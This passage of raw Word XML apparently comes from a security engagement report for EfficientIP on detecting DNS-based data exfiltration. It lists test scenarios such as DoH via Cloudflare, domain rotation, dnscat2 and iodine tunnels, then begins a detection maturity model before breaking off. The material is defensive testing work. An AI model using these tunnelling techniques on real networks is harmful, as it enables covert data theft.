            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1DB34CD8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0297CADF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="144E7CAB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="221173AF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="128FB69A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="186BED80" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3CA3945D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>10b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A7F8EBF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DoH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> via Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A9422DC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="600A13DB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7DA8B2C3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4BDEECDB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="42317DE0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7FB6DEED" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="25932129" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6F7A5C71" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7F830589" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="60786841" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Domain rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="06447FD3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0CE87EF2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E5AD3B8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0D791077" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="787957CE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="622A6AFA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1056DD74" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="7E3C0B30" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="443948D2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="64AB7E2C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>dnscat2 tunnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="22144EAE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="001B23E2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2C3C5132" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2103B892" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="26CC6CE4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0B7A34FB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A4F45F7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0D47DB46" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6086374F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1804A9BE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>iodine IP tunnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="05F0A1EA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7B8030D9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7FDEE06D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2454AF82" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5FDDD615" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5C6AC4E2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="07100977" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18B3B305" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E78F33" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11. Post-Engagement Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D5CD7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148F5842" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>11.1 Maturity Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A399FA3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the results from Section 10 to place </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EfficientIP's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> current detection capability on this maturity scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE0AE0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="1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5B2212" w14:paraId="1784D877" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="02E42B57" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="065F54BE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="1242AFFB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detection Capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="2365E813" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Scenarios Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="5CDBD842" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5E7107DC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="31477514" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1D633C83" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rate-based detection only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="03152291" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="5DFFAE48" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="79045609" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="366583FE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Developing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6F857053" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rate + entropy on A records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6D33242C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1–3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="4FF1C631" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="34CDFB90" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D38A35E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
